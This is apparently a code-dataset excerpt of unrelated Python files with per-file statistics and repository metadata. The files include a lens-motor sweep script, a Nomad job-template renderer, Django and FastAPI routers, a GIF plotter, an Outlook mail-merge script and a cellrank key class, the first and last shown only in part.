open(os.path.join(emaildir, os.path.splitext(resume.textFileName)[0] + ext), 'w') as f: f.write(email) def main(): parser = argparse.ArgumentParser(description='Search text resume files for skillset matches.') parser.add_argument('dir', help='Directory with .txt resume files') parser.add_argument('--csv', help='CSV file with name <email>,matching resume file of people who stopped by the booth') parser.add_argument('--notus', help='Directory with .txt resumes files that may be non-U.S. residents') parser.add_argument('--done', help='Directory with .txt resume files that have been contacted') parser.add_argument('--generic', help='Simply create generic emails and ignore project matches', default=False) #parser.add_argument('matches', help='file to write potential matches to') args = parser.parse_args() resumeFiles = readResumeFiles(args.dir) # Check to see if we have resumes to process that we've already # send email to. if args.done: doneResumes = readResumeFiles(args.done) emails = [resume.emails[0] for resume in doneResumes if resume.emails] for email in emails: pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email] matches = [resume.pdfFileName for resume in doneResumes if resume.emails and resume.emails[0] == email] if pdfs: print('Already contacted:', email, ' '.join(pdfs), 'matches done resume', ' '.join(matches)) if args.notus: notusResumes = readResumeFiles(args.notus) if args.generic: genericdir = os.path.join(args.dir, 'generic-todo') if not os.path.exists(genericdir): os.makedirs(genericdir) for resume in resumeFiles: craftGenericEmail(genericdir, resume) return boothstops = (searchForEmail(args.csv, resumeFiles) + searchForEmail(args.csv, doneResumes) + searchForEmail(args.csv, notusResumes)) boothlist = set() for email, filelist in boothstops: boothlist.update(filelist) print('Booth stop list', boothstops) print('Booth stop pdfs', boothlist) print('Done resumes', [resume.pdfFileName for resume in doneResumes]) matchWithProjects(resumeFiles) boothandresume = len([resume for resume in resumeFiles if resume.pdfFileName in boothlist and len(resume.strongProjectMatches)]) print('People who stopped by the booth who have a resume and need an email:', boothandresume) print('People who stopped by the booth who have a resume and have been sent email:', len([resume for resume in doneResumes if resume.pdfFileName in boothlist])) print('People who stopped by the booth who have a resume and may be non-U.S. citizens:', len([resume for resume in notusResumes if resume.pdfFileName in boothlist])) createFormEmails(args.dir, resumeFiles, boothlist, generic) if __name__ == "__main__": main()
48.839204
271
0.62304
3,565
31,892
5.56662
0.223562
0.013152
0.014966
0.017737
0.408869
0.323558
0.261124
0.204837
0.185739
0.162509
0
0.005901
0.266744
31,892
652
272
48.91411
0.84272
0.157657
0
0.258873
0
0.004175
0.363789
0.018087
0
0
0
0.001534
0
1
0.02714
false
0
0.016701
0
0.070981
0.033403
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822032599db3ee1487dab68a324fbb6a098cbc67
6,292
py
Python
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
13
2019-11-20T08:53:53.000Z
2021-12-21T14:05:37.000Z
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
19
2020-08-09T05:24:03.000Z
2021-07-01T07:07:37.000Z
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
3
2020-03-30T12:51:55.000Z
2021-08-09T11:22:29.000Z
import cv2 import os import serial import sys import scf4_tools import time import threading import camera import numpy as np from scipy.interpolate import interp1d from tqdm import tqdm CHB_MOVE = 7 CHA_MOVE = 6 CHB_PI = 4 CHA_PI = 3 def parse_data(data): out_x = [] out_y = [] for i in data: p2 = i.split(" ") out_x.append(int(p2[0])) out_y.append(int(p2[1])) return out_x, out_y def scale(val, src, dst): return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0] ser = serial.Serial() ser.port = 'COM231' # Controller com port ser.baudrate = 115200 # BAUD rate when connected over CDC USB is not important ser.timeout = 5 # max timeout to wait for command response print("Open COM port:", ser.port) ser.open() ser.flushInput() ser.flushOutput() c = camera.Cam() print("Starting cam") c.start() print("Waiting for camera") while c.fps == 0: time.sleep(0.1) # should be implemented with queue/signals but good enough for testing print("Cam is operational") c.set_cam_text("Prepare") print("Read controller version strings") scf4_tools.send_command(ser, "$S", echo=True) print("Initialize controller") scf4_tools.send_command(ser, "$B2", echo=True) print("# Set motion to forced mode") scf4_tools.send_command(ser, "M231 A", echo=True) print("Set stepping mode") scf4_tools.send_command(ser, "M243 C6", echo=True) print("Set normal move") scf4_tools.send_command(ser, 'M230', echo=True) print("Set to rel movement mode") scf4_tools.send_command(ser, 'G91', echo=True) print("Energize PI leds") scf4_tools.send_command(ser, "M238", echo=True) print("Set motor power") scf4_tools.send_command(ser, "M234 A190 B190 C190 D90", echo=True) print("Set motor sleep power") scf4_tools.send_command(ser, "M235 A120 B120 C120", echo=True) print("Set motor drive speed") scf4_tools.send_command(ser, "M240 A600 B600 C600", echo=True) print("Set PI low/high detection voltage") scf4_tools.send_command(ser, "M232 A400 B400 C400 E700 F700 G700", echo=True) print("Filter = VIS") scf4_tools.send_command(ser, "M7", echo=True) c.set_cam_text("Homing A") print() print("Home axis A") print("Get status") status_str = scf4_tools.send_command(ser, "!1") status = scf4_tools.parse_status(status_str) print(status_str) if status[3] == 0: print("Dir 1") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode scf4_tools.send_command(ser, "G0 A+100") scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) else: print("Dir 2") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode scf4_tools.send_command(ser, "G0 A-100") scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over print("Motor normal mode") scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode scf4_tools.send_command(ser, "G0 A-200") scf4_tools.wait_homing(ser, 1, CHA_MOVE) # Wait until homing is over print("Motor forced mode") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode scf4_tools.send_command(ser, "G0 A+100") scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over print("Set current coordinate as middle") scf4_tools.send_command(ser, "G92 A32000") # set current coordinate to 32000 scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode scf4_tools.send_command(ser, "G90") c.set_cam_text("Homing B") print() print("Home axis B") print("Get status") status_str = scf4_tools.send_command(ser, "!1") status = scf4_tools.parse_status(status_str) print(status_str) if status[4] == 0: print("Dir 1") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode scf4_tools.send_command(ser, "G0 B+100") scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) else: print("Dir 2") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode scf4_tools.send_command(ser, "G0 B-100") scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over print("Motor normal mode") scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode scf4_tools.send_command(ser, "G0 B-200") scf4_tools.wait_homing(ser, 1, CHB_MOVE) # Wait until homing is over print("Motor forced mode") scf4_tools.send_command(ser, "G91") scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode scf4_tools.send_command(ser, "G0 B+100") scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over print("Set current coordinate as middle") scf4_tools.send_command(ser, "G92 B32000") # set current coordinate to 32000 scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode scf4_tools.send_command(ser, "G90") with open('line_inf2.txt') as f: lines = f.readlines() x, y = parse_data(lines) x, y = parse_data(lines) xi = np.linspace(min(x), max(x), num=max(x)-min(x), endpoint=True) yi = interp1d(x, y, kind='cubic') new_list2 = [] for i in range(min(x), max(x), 10): y = float(np.asarray(yi(i))) new_list2.append((i, y)) # reverse motion directon (from wide to narrow) new_list2 = new_list2[::-1] print("Set motor drive speed") scf4_tools.send_command(ser, "M240 A500 B500 C500", echo=True) c.set_cam_text("Moving to wide angle") (x, y) = new_list2[0] scf4_tools.send_command(ser, "G0 A"+str(x)) scf4_tools.wait_homing(ser, 1, CHA_MOVE) # Wait until homing is over scf4_tools.send_command(ser, "G0 B"+str(y)) scf4_tools.wait_homing(ser, 1, CHB_MOVE) # Wait until homing is over print("Done") time.sleep(1) for i in tqdm(range(len(new_list2))): (x, y) = new_list2[i] zoom = round(scale(x, (39800, 22600), (5.5, 95)), 1) c.set_cam_text("Focal length: "+str(zoom)+"mm") scf4_tools.send_command(ser, "G0 A"+str(x)+ " B"+str(y)) time.sleep(0.001) c.set_cam_text("Sleeping 10s") time.sleep(10) f.close() time.sleep(10) c.stop()
23.833333
90
0.687381
1,043
6,292
3.981783
0.21093
0.127859
0.143992
0.221527
0.627498
0.574524
0.538888
0.522755
0.522273
0.507826
0
0.064709
0.177209
6,292
263
91
23.923954
0.737493
0.124285
0
0.372671
0
0
0.175237
0
0
0
0
0
0
1
0.012422
false
0
0.068323
0.006211
0.093168
0.223602
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
8220698c204a1446ed030218727b2f760902286f
61
py
Python
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
1
2022-03-07T15:45:06.000Z
2022-03-07T15:45:06.000Z
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
null
null
null
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
null
null
null
# Import from .EchoTextClassifier import EchoTextClassifier
15.25
50
0.852459
5
61
10.4
0.6
0
0
0
0
0
0
0
0
0
0
0
0.114754
61
3
51
20.333333
0.962963
0.098361
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
5
82216f99b184a3762b1bf3acde24777396628147
5,053
py
Python
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
null
null
null
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
3
2021-11-10T11:08:14.000Z
2021-11-26T13:12:20.000Z
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
null
null
null
import subprocess import logging import os from pathlib import Path from ..docker import docker import jinja2 log = logging.getLogger(__name__) TEMPLATES = Path(__file__).parent.parent.parent.resolve() / 'templates' def set_volumes_paths(substitutions={}): """Sets the volumes paths in the job options :param substitutions: dictionary containing the job options :returns: the job options :rtype: dict """ from ..configuration import config substitutions['config'] = config substitutions['liquid_domain'] = config.liquid_domain substitutions['liquid_volumes'] = config.liquid_volumes substitutions['liquid_collections'] = config.liquid_collections substitutions['liquid_http_port'] = config.liquid_http_port substitutions['liquid_2fa'] = config.liquid_2fa substitutions['check_interval'] = config.check_interval substitutions['check_timeout'] = config.check_timeout substitutions['consul_url'] = config.consul_url substitutions['exec_command'] = docker.exec_command_str substitutions['https_enabled'] = config.https_enabled if config.https_enabled: substitutions['liquid_https_port'] = config.liquid_https_port substitutions['acme_email'] = config.https_acme_email substitutions['acme_caServer'] = config.https_acme_caServer repos = { 'snoop2': { 'org': 'hoover', 'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-snoop2'), 'target': '/opt/hoover/snoop' }, 'search': { 'org': 'hoover', 'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-search'), 'target': '/opt/hoover/search' }, 'ui_src': { 'org': 'hoover', 'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/src'), 'target': '/opt/hoover/ui/src' }, 'ui_pages': { 'org': 'hoover', 'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/pages'), 'target': '/opt/hoover/ui/pages' }, 'ui_styles': { 'org': 'hoover', 'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/styles'), 'target': '/opt/hoover/ui/styles' }, 'core': { 'org': 'liquidinvestigations', 'local': os.path.join(config.liquidinvestigations_repos_path, 'core'), 'target': '/app' }, 'authproxy': { 'org': 'liquidinvestigations', 'local': os.path.join(config.liquidinvestigations_repos_path, 'authproxy'), 'target': '/app' }, 'codimd_server': { 'org': 'liquidinvestigations', 'local': os.path.join(config.liquidinvestigations_repos_path, 'codimd-server'), 'target': '/app', }, 'dokuwiki': { 'org': 'liquidinvestigations', 'local': os.path.join(config.liquidinvestigations_repos_path, 'liquid-dokuwiki'), 'target': '/liquid', }, } for repo, repo_config in repos.items(): key_repo = f"{repo_config['org']}_{repo}_repo" key_git = f"{repo_config['org']}_{repo}_git" substitutions[key_repo] = '' substitutions[key_git] = '' if config.mount_local_repos: if Path(repo_config['local']).is_dir(): substitutions[key_repo] = f"\"{repo_config['local']}:{repo_config['target']}\",\n" tag = subprocess.check_output( f"git -C {repo_config['local']} describe --tags --dirty --broken", shell=True, ).decode('utf-8').strip() md5sum = subprocess.check_output( f"git -C {repo_config['local']} diff HEAD | md5sum", shell=True, ).decode('utf-8').strip() substitutions[key_git] = tag + md5sum else: log.warn(f'Invalid repo path "{repo_config["local"]}"') return substitutions def render(template, subs): from ..configuration import config env = jinja2.Environment( variable_start_string="${", variable_end_string="}", loader=jinja2.FileSystemLoader(str(config.templates)), ) env.globals['int'] = int env.globals['max'] = max return env.from_string(template).render(subs) def get_job(hcl_path, substitutions={}): """Return the job description generated from the given template :param hcl_path: the path to the hcl template file :param substitutions: dictionary containing the job options :returns: the job description :rtype: str """ with hcl_path.open() as job_file: template = job_file.read() output = render(template, set_volumes_paths(substitutions)) return output class Job: vault_secret_keys = () core_oauth_apps = () stage = 2 generate_oauth2_proxy_cookie = False extra_secret_fn = None
34.141892
98
0.610133
527
5,053
5.637571
0.275142
0.021205
0.033322
0.045439
0.317065
0.296533
0.280377
0.280377
0.280377
0.252777
0
0.003739
0.259054
5,053
147
99
34.37415
0.789797
0.070453
0
0.150442
0
0
0.209122
0.032702
0
0
0
0
0
1
0.026549
false
0
0.070796
0
0.176991
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82217d544e3cd1e38f1b553da33b7d271e94aff5
389
py
Python
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
import morepath class app(morepath.App): pass class StaticMethod(object): pass class Root(object): def __init__(self): self.value = 'ROOT' @staticmethod @app.path(model=StaticMethod, path='static') def static_method(): return StaticMethod() @app.view(model=StaticMethod) def static_method_default(self, request): return "Static Method"
15.56
48
0.678663
45
389
5.711111
0.444444
0.140078
0.116732
0
0
0
0
0
0
0
0
0
0.210797
389
24
49
16.208333
0.837134
0
0
0.133333
0
0
0.059126
0
0
0
0
0
0
1
0.2
false
0.133333
0.066667
0.133333
0.6
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
1
0
0
0
2
8222def448064d7e5190de17a9fd652126451dc7
1,035
py
Python
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
from django.urls import include from django.conf.urls import url from rest_framework.routers import SimpleRouter from rest_framework_nested.routers import NestedSimpleRouter from .views import ( HostViewSet, HostAdminViewSet, ClusterViewSet, InfobaseViewSet, ) host_router = SimpleRouter() host_router.register(r'hosts', HostViewSet, basename='host') host_admin_router = NestedSimpleRouter(host_router, r'hosts', lookup='host') host_admin_router.register(r'admins', HostAdminViewSet, basename='host-admin') cluster_router = NestedSimpleRouter(host_router, r'hosts', lookup='host') cluster_router.register(r'clusters', ClusterViewSet, basename='cluster') infobase_router = NestedSimpleRouter(cluster_router, r'clusters', lookup='cluster') infobase_router.register(r'infobases', InfobaseViewSet, basename='infobase') urlpatterns = [ url(r'^', include(host_router.urls)), url(r'^', include(host_admin_router.urls)), url(r'^', include(cluster_router.urls)), url(r'^', include(infobase_router.urls)), ]
34.5
83
0.774879
122
1,035
6.401639
0.262295
0.06402
0.076825
0.053777
0.208707
0.128041
0.128041
0.128041
0
0
0
0
0.100483
1,035
29
84
35.689655
0.838883
0
0
0
0
0
0.090821
0
0
0
0
0
0
1
0
false
0
0.208333
0
0.208333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82240b4e497af879de2b8332d733c22fc5035c5f
6,292
py
Python
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
1
2021-12-14T09:16:17.000Z
2021-12-14T09:16:17.000Z
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
null
null
null
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
2
2021-12-14T09:10:00.000Z
2022-01-21T16:57:44.000Z
import matplotlib.pyplot as plt import imageio import os import numpy as np class GIFPloter(): def __init__(self, args, model): self.plot_method = 'Li' self.gif_axlist = [] self.clist = ['r', 'g', 'b', 'y', 'm', 'c', 'k', 'pink', 'lightblue', 'lightgreen', 'grey'] self.fig, self.ax = plt.subplots() self.his_loss = None self.NetworkStructure = args['NetworkStructure'] self.current_subfig_index = 2 self.plot_every_epoch = args['PlotForloop'] self.infor_index_list = model.plot_index_list self.name_list = model.name_list self.num_subfig = len(model.plot_index_list) self.layer_num = len(args['NetworkStructure']) - 1 if self.plot_method == 'Zang': self.num_fig_every_row = int(np.sqrt(self.num_subfig))+1 self.num_row = int(1+(self.num_subfig - 0.5) // self.num_fig_every_row) self.sub_position_list = [i+1 for i in range(self.num_subfig)] if self.plot_method == 'Li': self.num_fig_every_row = 2 self.num_row = int(1+(self.num_subfig - 0.5) // self.num_fig_every_row) self.sub_position_list = [i*2 + 1 for i in range(self.num_subfig//2)] +\ [self.num_subfig] + \ list(reversed([i*2 + 2 for i in range(self.num_subfig//2)])) def PlotOtherLayer(self, fig, data, label, title='', fig_position0=1, fig_position1=1, fig_position2=1, s=8): from sklearn.decomposition import PCA # input(fig_position) color_list = [] for i in range(label.shape[0]): color_list.append(int(label[i])) if data.shape[1] > 3: pca = PCA(n_components=2) try: data_em = pca.fit_transform(data) except: print("Error in plot latent space: PCA.") data_max = np.max(data) if np.max(data) < 1e30 else 1e30 data_min = np.min(data) if np.min(data) > 1e-5 else 1e-2 data -= data_min data /= data_max data_em = pca.fit_transform(data) else: data_em = data data_em = data_em - data_em.mean(axis=0) if data_em.shape[1] == 3: ax = fig.add_subplot(fig_position0, fig_position1, fig_position2, projection='3d') ax.scatter( data_em[:, 0], data_em[:, 1], data_em[:, 2], c=color_list, s=s, cmap='rainbow') if data_em.shape[1] == 2: ax = fig.add_subplot(fig_position0, fig_position1, fig_position2) ax.scatter( data_em[:, 0], data_em[:, 1], c=label, s=s, cmap='rainbow') plt.axis('equal') plt.title(title) self.current_subfig_index = self.current_subfig_index+1 def update_loss(self, loss=None): """ 0721, append loss list """ if self.his_loss is None and loss is not None: self.his_loss = [[] for i in range(len(loss))] elif loss is not None: for i, loss_item in enumerate(loss): self.his_loss[i].append(loss_item) def AddNewFig(self, output_info, label_point, loss=None, title_='', save=True): self.update_loss(loss) self.current_subfig_index = 1 fig = plt.figure(figsize=(5*self.num_fig_every_row, 5*self.num_row)) for i, index in enumerate(self.infor_index_list): self.PlotOtherLayer( fig, output_info[index], label_point, title=self.name_list[index], fig_position0=self.num_row, fig_position1=self.num_fig_every_row, fig_position2=int(self.sub_position_list[i])) if loss is not None: loss_interval = 200 loss_sum = [] for i in range(len(self.his_loss[1])): tmp = 0 for j in range(len(self.his_loss)): try: tmp += self.his_loss[j][i] except: pass loss_sum.append(tmp) # add new subplot ax = fig.add_subplot(self.num_row, self.num_fig_every_row, int(max(self.sub_position_list))+1) l1, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[0], 'bo-') l2, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[1], 'ko-') l3, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[2], 'yo-') l4, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[3], 'ro-') l5, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[4], 'mo-') l6, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[5], 'go-') l7, = ax.plot( [i*loss_interval for i in range(len(self.his_loss[0]))], loss_sum, 'co-') ax.legend((l1, l2, l3, l4, l5, l6, l7), ('dis', 'push', 'ang', 'orth', 'pad', 'ae', 'sum')) # loss plt.title('loss history') plt.tight_layout() if save: plt.savefig(title_+'.png', dpi=300) plt.close() def SaveGIF(self, path): gif_images_path = os.listdir(path+'/') gif_images_path.sort() print(gif_images_path) gif_images = [] for _, path_ in enumerate(gif_images_path): print(path_) if '.png' in path_: # print(path+'/'+path_) gif_images.append(imageio.imread(path+'/'+path_)) imageio.mimsave(path+'/'+"latent.gif", gif_images, fps=10)
37.230769
84
0.508423
808
6,292
3.748762
0.215347
0.04622
0.072631
0.04721
0.369759
0.295807
0.252228
0.252228
0.203698
0.203698
0
0.026131
0.367451
6,292
168
85
37.452381
0.734925
0.013827
0
0.138686
0
0
0.034544
0
0
0
0
0
0
1
0.036496
false
0.007299
0.036496
0
0.080292
0.021898
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8226023cb3139084f438cf9dfe3adae050279971
1,336
py
Python
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
import logging import os import win32com.client import pandas as pd logging.basicConfig(level=logging.INFO) templateName = "Template.msg" recipientsFile = "Recipients.xlsx" logging.info('Violet App Start') path = os.getcwd() logging.info('Current Directory {}'.format(path)) outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI") mail = outlook.OpenSharedItem(os.path.join(path,templateName)) logging.info("件名: {}".format(mail.subject)) logging.info("本文: {}".format(mail.HTMLBody)) originalBody = mail.HTMLBody df = pd.read_excel(os.path.join(path,recipientsFile), sheet_name='Recipients') logging.info(df) outputDir = os.path.join(path,'output') if not os.path.isdir(outputDir): os.mkdir(outputDir) for index, row in df.iterrows(): replacedBody = originalBody recipient = "" for indexName in row.index: logging.info("indexName {}".format(indexName)) if indexName == "TO": mail.Recipients.Add(row[indexName]) recipient =row[indexName] else: replacedBody = replacedBody.replace(indexName,row[indexName]) mail.HTMLBody = replacedBody mail.SaveAs(os.path.join(outputDir,"{}.msg".format(recipient.replace("@","_")))) mail.Recipients.Remove(1) logging.info('Violet App End')
29.688889
85
0.68488
156
1,336
5.846154
0.416667
0.096491
0.04386
0.046053
0
0
0
0
0
0
0
0.004517
0.171407
1,336
45
86
29.688889
0.819332
0
0
0
0
0
0.116009
0
0
0
0
0
0
1
0
false
0
0.117647
0
0.117647
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8226308b8a2c2e852acb6dff9db13ef1f87ee5ed
1,409
py
Python
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
from typing import List from fastapi import APIRouter from .. import database, schemas, models, oauth2 from sqlalchemy.orm import Session from fastapi import APIRouter, Depends, status from ..repository import backlog router = APIRouter(prefix="/backlog", tags=["Backlog"]) get_db = database.get_db @router.get("/", response_model=List[schemas.Backlog]) def get_all( db: Session = Depends(get_db)): return backlog.get_all(db) @router.get("/{id}", status_code=200, response_model=schemas.Backlog) def get( id: int, db: Session = Depends(get_db), current_user: schemas.User = Depends(oauth2.get_current_user) ): return backlog.get(id, db) @router.post("/", status_code=status.HTTP_201_CREATED) def create( request: schemas.Backlog, db: Session = Depends(get_db), current_user: schemas.User = Depends(oauth2.get_current_user) ): return backlog.create(request, db) @router.delete("/{id}", status_code=status.HTTP_204_NO_CONTENT) def destroy( id: int, db: Session = Depends(get_db), current_user: schemas.User = Depends(oauth2.get_current_user), ): return backlog.destroy(id, db) @router.put("/{id}", status_code=status.HTTP_202_ACCEPTED) def update( id: int, request: schemas.Backlog, db: Session = Depends(get_db), current_user: schemas.User = Depends(oauth2.get_current_user), ): return backlog.update(id, request, db)
24.719298
69
0.71895
194
1,409
5.046392
0.247423
0.089888
0.081716
0.097038
0.458631
0.392237
0.392237
0.392237
0.392237
0.392237
0
0.014226
0.151881
1,409
56
70
25.160714
0.805021
0
0
0.414634
0
0
0.022776
0
0
0
0
0
0
1
0.121951
false
0
0.146341
0.121951
0.390244
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
82270abb34448de1d28c848049ee656003285eab
2,902
py
Python
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
172
2020-03-19T19:50:53.000Z
2022-03-28T09:36:04.000Z
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
702
2020-03-19T08:09:04.000Z
2022-03-30T09:55:14.000Z
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
17
2020-04-07T03:11:02.000Z
2022-02-02T20:39:16.000Z
from typing import Any, Callable, Optional class cprop: """Class property.""" def __init__(self, f: Callable[..., str]): self.f = f def __get__(self, obj: Any, owner: Any) -> str: return self.f(owner) class Key: """Class which manages keys in :class:`anndata.AnnData`.""" @classmethod def backward(cls, bwd: bool) -> str: return "bwd" if bwd else "fwd" @classmethod def where(cls, bwd: bool) -> str: return "from" if bwd else "to" @classmethod def initial(cls, bwd: bool) -> str: return "initial" if bwd else "terminal" @classmethod def cytotrace(cls, key: str) -> str: return f"ct_{key}" class obs: @classmethod def probs(cls, key: str) -> str: return f"{key}_probs" @classmethod def macrostates(cls, bwd: bool) -> str: return f"macrostates_{Key.backward(bwd)}" @classmethod def term_states(cls, bwd: bool) -> str: return f"{Key.initial(bwd)}_states" @classmethod def priming_degree(cls, bwd: bool) -> str: return f"priming_degree_{Key.backward(bwd)}" class obsm: @classmethod def memberships(cls, key: str) -> str: return f"{key}_memberships" @classmethod def schur_vectors(cls, bwd: bool) -> str: return f"schur_vectors_{Key.backward(bwd)}" @classmethod def macrostates(cls, bwd: bool) -> str: return f"macrostates_{Key.backward(bwd)}" @classmethod def abs_probs(cls, bwd: bool) -> str: return ("from" if bwd else "to") + "_" + Key.obs.term_states(bwd) @classmethod def abs_times(cls, bwd: bool) -> str: return f"absorption_times_{Key.backward(bwd)}" class varm: @classmethod def lineage_drivers(cls, bwd: bool): return ("initial" if bwd else "terminal") + "_lineage_drivers" class uns: @classmethod def kernel(cls, bwd: bool, key: Optional[str] = None) -> str: return key if key is not None else f"T_{Key.backward(bwd)}" @classmethod def estimator(cls, bwd: bool, key: Optional[str] = None) -> str: return key if key is not None else f"{Key.backward(bwd)}_estimator" @classmethod def names(cls, key: str) -> str: return f"{key}_names" @classmethod def colors(cls, key: str) -> str: return f"{key}_colors" @classmethod def eigen(cls, bwd: bool) -> str: return f"eigendecomposition_{Key.backward(bwd)}" @classmethod def schur_matrix(cls, bwd: bool) -> str: return f"schur_matrix_{Key.backward(bwd)}" @classmethod def coarse(cls, bwd: bool) -> str: return f"coarse_{Key.backward(bwd)}"
27.903846
79
0.567884
351
2,902
4.584046
0.193732
0.117464
0.099441
0.105034
